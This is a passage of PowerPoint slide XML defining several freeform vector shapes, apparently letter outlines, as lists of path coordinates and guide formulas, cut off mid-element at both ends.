                      <a:pt x="47" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="157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83" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3997325" y="1258888"/>
                <a:ext cx="215900" cy="234950"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 446 w 600"/>
                  <a:gd name="T1" fmla="*/ 515 h 652"/>
                  <a:gd name="T2" fmla="*/ 446 w 600"/>
                  <a:gd name="T3" fmla="*/ 515 h 652"/>
                  <a:gd name="T4" fmla="*/ 436 w 600"/>
                  <a:gd name="T5" fmla="*/ 556 h 652"/>
                  <a:gd name="T6" fmla="*/ 425 w 600"/>
                  <a:gd name="T7" fmla="*/ 572 h 652"/>
                  <a:gd name="T8" fmla="*/ 410 w 600"/>
                  <a:gd name="T9" fmla="*/ 588 h 652"/>
                  <a:gd name="T10" fmla="*/ 410 w 600"/>
                  <a:gd name="T11" fmla="*/ 588 h 652"/>
                  <a:gd name="T12" fmla="*/ 378 w 600"/>
                  <a:gd name="T13" fmla="*/ 614 h 652"/>
                  <a:gd name="T14" fmla="*/ 341 w 600"/>
                  <a:gd name="T15" fmla="*/ 635 h 652"/>
                  <a:gd name="T16" fmla="*/ 341 w 600"/>
                  <a:gd name="T17" fmla="*/ 635 h 652"/>
                  <a:gd name="T18" fmla="*/ 310 w 600"/>
                  <a:gd name="T19" fmla="*/ 645 h 652"/>
                  <a:gd name="T20" fmla="*/ 283 w 600"/>
                  <a:gd name="T21" fmla="*/ 651 h 652"/>
                  <a:gd name="T22" fmla="*/ 252 w 600"/>
                  <a:gd name="T23" fmla="*/ 645 h 652"/>
                  <a:gd name="T24" fmla="*/ 231 w 600"/>
                  <a:gd name="T25" fmla="*/ 641 h 652"/>
                  <a:gd name="T26" fmla="*/ 231 w 600"/>
                  <a:gd name="T27" fmla="*/ 641 h 652"/>
                  <a:gd name="T28" fmla="*/ 205 w 600"/>
                  <a:gd name="T29" fmla="*/ 625 h 652"/>
                  <a:gd name="T30" fmla="*/ 184 w 600"/>
                  <a:gd name="T31" fmla="*/ 604 h 652"/>
                  <a:gd name="T32" fmla="*/ 168 w 600"/>
                  <a:gd name="T33" fmla="*/ 578 h 652"/>
                  <a:gd name="T34" fmla="*/ 152 w 600"/>
                  <a:gd name="T35" fmla="*/ 541 h 652"/>
                  <a:gd name="T36" fmla="*/ 0 w 600"/>
                  <a:gd name="T37" fmla="*/ 157 h 652"/>
                  <a:gd name="T38" fmla="*/ 136 w 600"/>
                  <a:gd name="T39" fmla="*/ 105 h 652"/>
                  <a:gd name="T40" fmla="*/ 273 w 600"/>
                  <a:gd name="T41" fmla="*/ 462 h 652"/>
                  <a:gd name="T42" fmla="*/ 273 w 600"/>
                  <a:gd name="T43" fmla="*/ 462 h 652"/>
                  <a:gd name="T44" fmla="*/ 294 w 600"/>
                  <a:gd name="T45" fmla="*/ 498 h 652"/>
                  <a:gd name="T46" fmla="*/ 310 w 600"/>
                  <a:gd name="T47" fmla="*/ 515 h 652"/>
                  <a:gd name="T48" fmla="*/ 310 w 600"/>
                  <a:gd name="T49" fmla="*/ 515 h 652"/>
                  <a:gd name="T50" fmla="*/ 331 w 600"/>
                  <a:gd name="T51" fmla="*/ 520 h 652"/>
                  <a:gd name="T52" fmla="*/ 362 w 600"/>
                  <a:gd name="T53" fmla="*/ 515 h 652"/>
                  <a:gd name="T54" fmla="*/ 362 w 600"/>
                  <a:gd name="T55" fmla="*/ 515 h 652"/>
                  <a:gd name="T56" fmla="*/ 378 w 600"/>
                  <a:gd name="T57" fmla="*/ 504 h 652"/>
                  <a:gd name="T58" fmla="*/ 389 w 600"/>
                  <a:gd name="T59" fmla="*/ 498 h 652"/>
                  <a:gd name="T60" fmla="*/ 399 w 600"/>
                  <a:gd name="T61" fmla="*/ 483 h 652"/>
                  <a:gd name="T62" fmla="*/ 404 w 600"/>
                  <a:gd name="T63" fmla="*/ 472 h 652"/>
                  <a:gd name="T64" fmla="*/ 410 w 600"/>
                  <a:gd name="T65" fmla="*/ 457 h 652"/>
                  <a:gd name="T66" fmla="*/ 410 w 600"/>
                  <a:gd name="T67" fmla="*/ 441 h 652"/>
                  <a:gd name="T68" fmla="*/ 399 w 600"/>
                  <a:gd name="T69" fmla="*/ 399 h 652"/>
                  <a:gd name="T70" fmla="*/ 263 w 600"/>
                  <a:gd name="T71" fmla="*/ 53 h 652"/>
                  <a:gd name="T72" fmla="*/ 399 w 600"/>
                  <a:gd name="T73" fmla="*/ 0 h 652"/>
                  <a:gd name="T74" fmla="*/ 599 w 600"/>
                  <a:gd name="T75" fmla="*/ 525 h 652"/>
                  <a:gd name="T76" fmla="*/ 473 w 600"/>
                  <a:gd name="T77" fmla="*/ 572 h 652"/>
                  <a:gd name="T78" fmla="*/ 446 w 600"/>
                  <a:gd name="T79" fmla="*/ 515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00" h="652">
                    <a:moveTo>
                      <a:pt x="446" y="515"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="446" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="515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84" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4183063" y="1209675"/>
                <a:ext cx="115887" cy="228600"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 132 w 322"/>
                  <a:gd name="T1" fmla="*/ 57 h 635"/>
                  <a:gd name="T2" fmla="*/ 153 w 322"/>
                  <a:gd name="T3" fmla="*/ 131 h 635"/>
                  <a:gd name="T4" fmla="*/ 158 w 322"/>
                  <a:gd name="T5" fmla="*/ 131 h 635"/>
                  <a:gd name="T6" fmla="*/ 158 w 322"/>
                  <a:gd name="T7" fmla="*/ 131 h 635"/>
                  <a:gd name="T8" fmla="*/ 169 w 322"/>
                  <a:gd name="T9" fmla="*/ 89 h 635"/>
                  <a:gd name="T10" fmla="*/ 189 w 322"/>
                  <a:gd name="T11" fmla="*/ 52 h 635"/>
                  <a:gd name="T12" fmla="*/ 189 w 322"/>
                  <a:gd name="T13" fmla="*/ 52 h 635"/>
                  <a:gd name="T14" fmla="*/ 200 w 322"/>
                  <a:gd name="T15" fmla="*/ 36 h 635"/>
                  <a:gd name="T16" fmla="*/ 216 w 322"/>
                  <a:gd name="T17" fmla="*/ 20 h 635"/>
                  <a:gd name="T18" fmla="*/ 232 w 322"/>
                  <a:gd name="T19" fmla="*/ 10 h 635"/>
                  <a:gd name="T20" fmla="*/ 253 w 322"/>
                  <a:gd name="T21" fmla="*/ 5 h 635"/>
                  <a:gd name="T22" fmla="*/ 253 w 322"/>
                  <a:gd name="T23" fmla="*/ 5 h 635"/>
                  <a:gd name="T24" fmla="*/ 263 w 322"/>
                  <a:gd name="T25" fmla="*/ 0 h 635"/>
                  <a:gd name="T26" fmla="*/ 263 w 322"/>
                  <a:gd name="T27" fmla="*/ 0 h 635"/>
                  <a:gd name="T28" fmla="*/ 279 w 322"/>
                  <a:gd name="T29" fmla="*/ 0 h 635"/>
                  <a:gd name="T30" fmla="*/ 321 w 322"/>
                  <a:gd name="T31" fmla="*/ 131 h 635"/>
                  <a:gd name="T32" fmla="*/ 321 w 322"/>
                  <a:gd name="T33" fmla="*/ 131 h 635"/>
                  <a:gd name="T34" fmla="*/ 300 w 322"/>
                  <a:gd name="T35" fmla="*/ 136 h 635"/>
                  <a:gd name="T36" fmla="*/ 300 w 322"/>
                  <a:gd name="T37" fmla="*/ 136 h 635"/>
                  <a:gd name="T38" fmla="*/ 279 w 322"/>
                  <a:gd name="T39" fmla="*/ 141 h 635"/>
                  <a:gd name="T40" fmla="*/ 279 w 322"/>
                  <a:gd name="T41" fmla="*/ 141 h 635"/>
                  <a:gd name="T42" fmla="*/ 242 w 322"/>
                  <a:gd name="T43" fmla="*/ 157 h 635"/>
                  <a:gd name="T44" fmla="*/ 242 w 322"/>
                  <a:gd name="T45" fmla="*/ 157 h 635"/>
                  <a:gd name="T46" fmla="*/ 226 w 322"/>
                  <a:gd name="T47" fmla="*/ 167 h 635"/>
                  <a:gd name="T48" fmla="*/ 216 w 322"/>
                  <a:gd name="T49" fmla="*/ 183 h 635"/>
                  <a:gd name="T50" fmla="*/ 216 w 322"/>
                  <a:gd name="T51" fmla="*/ 183 h 635"/>
                  <a:gd name="T52" fmla="*/ 205 w 322"/>
                  <a:gd name="T53" fmla="*/ 199 h 635"/>
                  <a:gd name="T54" fmla="*/ 200 w 322"/>
                  <a:gd name="T55" fmla="*/ 220 h 635"/>
                  <a:gd name="T56" fmla="*/ 200 w 322"/>
                  <a:gd name="T57" fmla="*/ 220 h 635"/>
                  <a:gd name="T58" fmla="*/ 200 w 322"/>
                  <a:gd name="T59" fmla="*/ 241 h 635"/>
                  <a:gd name="T60" fmla="*/ 205 w 322"/>
                  <a:gd name="T61" fmla="*/ 267 h 635"/>
                  <a:gd name="T62" fmla="*/ 305 w 322"/>
                  <a:gd name="T63" fmla="*/ 587 h 635"/>
                  <a:gd name="T64" fmla="*/ 169 w 322"/>
                  <a:gd name="T65" fmla="*/ 634 h 635"/>
                  <a:gd name="T66" fmla="*/ 0 w 322"/>
                  <a:gd name="T67" fmla="*/ 99 h 635"/>
                  <a:gd name="T68" fmla="*/ 132 w 322"/>
                  <a:gd name="T69" fmla="*/ 57 h 6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22" h="635">
                    <a:moveTo>
                      <a:pt x="132" y="57"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="153" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="57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85" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4287838" y="1128713"/>
                <a:ext cx="120650" cy="274637"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 137 w 337"/>
                  <a:gd name="T1" fmla="*/ 0 h 762"/>
                  <a:gd name="T2" fmla="*/ 169 w 337"/>
                  <a:gd name="T3" fmla="*/ 115 h 762"/>
                  <a:gd name="T4" fmla="*/ 32 w 337"/>
                  <a:gd name="T5" fmla="*/ 152 h 762"/>
                  <a:gd name="T6" fmla="*/ 0 w 337"/>
                  <a:gd name="T7" fmla="*/ 36 h 762"/>
                  <a:gd name="T8" fmla="*/ 137 w 337"/>
                  <a:gd name="T9" fmla="*/ 0 h 762"/>
                  <a:gd name="T10" fmla="*/ 189 w 337"/>
                  <a:gd name="T11" fmla="*/ 183 h 762"/>
                  <a:gd name="T12" fmla="*/ 336 w 337"/>
                  <a:gd name="T13" fmla="*/ 724 h 762"/>
                  <a:gd name="T14" fmla="*/ 195 w 337"/>
                  <a:gd name="T15" fmla="*/ 761 h 762"/>
                  <a:gd name="T16" fmla="*/ 48 w 337"/>
                  <a:gd name="T17" fmla="*/ 220 h 762"/>
                  <a:gd name="T18" fmla="*/ 189 w 337"/>
                  <a:gd name="T19" fmla="*/ 183 h 7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37" h="762">
                    <a:moveTo>
                      <a:pt x="137" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="169" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="189" y="183"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="336" y="724"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="183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86" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4383088" y="1114425"/>
                <a:ext cx="149225" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 173 w 415"/>
                  <a:gd name="T1" fmla="*/ 0 h 715"/>
                  <a:gd name="T2" fmla="*/ 210 w 415"/>
                  <a:gd name="T3" fmla="*/ 157 h 715"/>
                  <a:gd name="T4" fmla="*/ 289 w 415"/>
                  <a:gd name="T5" fmla="*/ 136 h 715"/>
                  <a:gd name="T6" fmla="*/ 310 w 415"/>
                  <a:gd name="T7" fmla="*/ 231 h 715"/>
                  <a:gd name="T8" fmla="*/ 231 w 415"/>
                  <a:gd name="T9" fmla="*/ 252 h 715"/>
                  <a:gd name="T10" fmla="*/ 299 w 415"/>
                  <a:gd name="T11" fmla="*/ 546 h 715"/>
                  <a:gd name="T12" fmla="*/ 299 w 415"/>
                  <a:gd name="T13" fmla="*/ 546 h 715"/>
                  <a:gd name="T14" fmla="*/ 310 w 415"/>
                  <a:gd name="T15" fmla="*/ 572 h 715"/>
                  <a:gd name="T16" fmla="*/ 320 w 415"/>
                  <a:gd name="T17" fmla="*/ 588 h 715"/>
                  <a:gd name="T18" fmla="*/ 320 w 415"/>
                  <a:gd name="T19" fmla="*/ 588 h 715"/>
                  <a:gd name="T20" fmla="*/ 336 w 415"/>
                  <a:gd name="T21" fmla="*/ 598 h 715"/>
                  <a:gd name="T22" fmla="*/ 362 w 415"/>
                  <a:gd name="T23" fmla="*/ 593 h 715"/>
                  <a:gd name="T24" fmla="*/ 362 w 415"/>
                  <a:gd name="T25" fmla="*/ 593 h 715"/>
                  <a:gd name="T26" fmla="*/ 378 w 415"/>
                  <a:gd name="T27" fmla="*/ 588 h 715"/>
                  <a:gd name="T28" fmla="*/ 378 w 415"/>
                  <a:gd name="T29" fmla="*/ 588 h 715"/>
                  <a:gd name="T30" fmla="*/ 394 w 415"/>
                  <a:gd name="T31" fmla="*/ 582 h 715"/>
                  <a:gd name="T32" fmla="*/ 414 w 415"/>
                  <a:gd name="T33" fmla="*/ 682 h 715"/>
                  <a:gd name="T34" fmla="*/ 414 w 415"/>
                  <a:gd name="T35" fmla="*/ 682 h 715"/>
                  <a:gd name="T36" fmla="*/ 373 w 415"/>
                  <a:gd name="T37" fmla="*/ 693 h 715"/>
                  <a:gd name="T38" fmla="*/ 373 w 415"/>
                  <a:gd name="T39" fmla="*/ 693 h 715"/>
                  <a:gd name="T40" fmla="*/ 325 w 415"/>
                  <a:gd name="T41" fmla="*/ 703 h 715"/>
                  <a:gd name="T42" fmla="*/ 325 w 415"/>
                  <a:gd name="T43" fmla="*/ 703 h 715"/>
                  <a:gd name="T44" fmla="*/ 289 w 415"/>
                  <a:gd name="T45" fmla="*/ 714 h 715"/>
                  <a:gd name="T46" fmla="*/ 257 w 415"/>
                  <a:gd name="T47" fmla="*/ 714 h 715"/>
                  <a:gd name="T48" fmla="*/ 257 w 415"/>
                  <a:gd name="T49" fmla="*/ 714 h 715"/>
                  <a:gd name="T50" fmla="*/ 231 w 415"/>
                  <a:gd name="T51" fmla="*/ 714 h 715"/>
                  <a:gd name="T52" fmla="*/ 215 w 415"/>
                  <a:gd name="T53" fmla="*/ 703 h 715"/>
                  <a:gd name="T54" fmla="*/ 215 w 415"/>
                  <a:gd name="T55" fmla="*/ 703 h 715"/>
                  <a:gd name="T56" fmla="*/ 200 w 415"/>
                  <a:gd name="T57" fmla="*/ 688 h 715"/>
                  <a:gd name="T58" fmla="*/ 184 w 415"/>
                  <a:gd name="T59" fmla="*/ 661 h 715"/>
                  <a:gd name="T60" fmla="*/ 184 w 415"/>
                  <a:gd name="T61" fmla="*/ 661 h 715"/>
                  <a:gd name="T62" fmla="*/ 163 w 415"/>
                  <a:gd name="T63" fmla="*/ 593 h 715"/>
                  <a:gd name="T64" fmla="*/ 90 w 415"/>
                  <a:gd name="T65" fmla="*/ 283 h 715"/>
                  <a:gd name="T66" fmla="*/ 21 w 415"/>
                  <a:gd name="T67" fmla="*/ 299 h 715"/>
                  <a:gd name="T68" fmla="*/ 0 w 415"/>
                  <a:gd name="T69" fmla="*/ 204 h 715"/>
                  <a:gd name="T70" fmla="*/ 68 w 415"/>
                  <a:gd name="T71" fmla="*/ 189 h 715"/>
                  <a:gd name="T72" fmla="*/ 31 w 415"/>
                  <a:gd name="T73" fmla="*/ 31 h 715"/>
                  <a:gd name="T74" fmla="*/ 173 w 415"/>
                  <a:gd name="T75" fmla="*/ 0 h 7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15" h="715">
                    <a:moveTo>
                      <a:pt x="173" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="210" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173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87" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4500563" y="1131888"/>
                <a:ext cx="161925" cy="287337"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 448"/>
                  <a:gd name="T1" fmla="*/ 688 h 799"/>
                  <a:gd name="T2" fmla="*/ 189 w 448"/>
                  <a:gd name="T3" fmla="*/ 688 h 799"/>
                  <a:gd name="T4" fmla="*/ 221 w 448"/>
                  <a:gd name="T5" fmla="*/ 677 h 799"/>
                  <a:gd name="T6" fmla="*/ 232 w 448"/>
                  <a:gd name="T7" fmla="*/ 667 h 799"/>
                  <a:gd name="T8" fmla="*/ 236 w 448"/>
                  <a:gd name="T9" fmla="*/ 656 h 799"/>
                  <a:gd name="T10" fmla="*/ 236 w 448"/>
                  <a:gd name="T11" fmla="*/ 656 h 799"/>
                  <a:gd name="T12" fmla="*/ 247 w 448"/>
                  <a:gd name="T13" fmla="*/ 630 h 799"/>
                  <a:gd name="T14" fmla="*/ 247 w 448"/>
                  <a:gd name="T15" fmla="*/ 599 h 799"/>
                  <a:gd name="T16" fmla="*/ 0 w 448"/>
                  <a:gd name="T17" fmla="*/ 74 h 799"/>
                  <a:gd name="T18" fmla="*/ 147 w 448"/>
                  <a:gd name="T19" fmla="*/ 48 h 799"/>
                  <a:gd name="T20" fmla="*/ 294 w 448"/>
                  <a:gd name="T21" fmla="*/ 415 h 799"/>
                  <a:gd name="T22" fmla="*/ 300 w 448"/>
                  <a:gd name="T23" fmla="*/ 415 h 799"/>
                  <a:gd name="T24" fmla="*/ 305 w 448"/>
                  <a:gd name="T25" fmla="*/ 21 h 799"/>
                  <a:gd name="T26" fmla="*/ 447 w 448"/>
                  <a:gd name="T27" fmla="*/ 0 h 799"/>
                  <a:gd name="T28" fmla="*/ 400 w 448"/>
                  <a:gd name="T29" fmla="*/ 536 h 799"/>
                  <a:gd name="T30" fmla="*/ 400 w 448"/>
                  <a:gd name="T31" fmla="*/ 536 h 799"/>
                  <a:gd name="T32" fmla="*/ 394 w 448"/>
                  <a:gd name="T33" fmla="*/ 599 h 799"/>
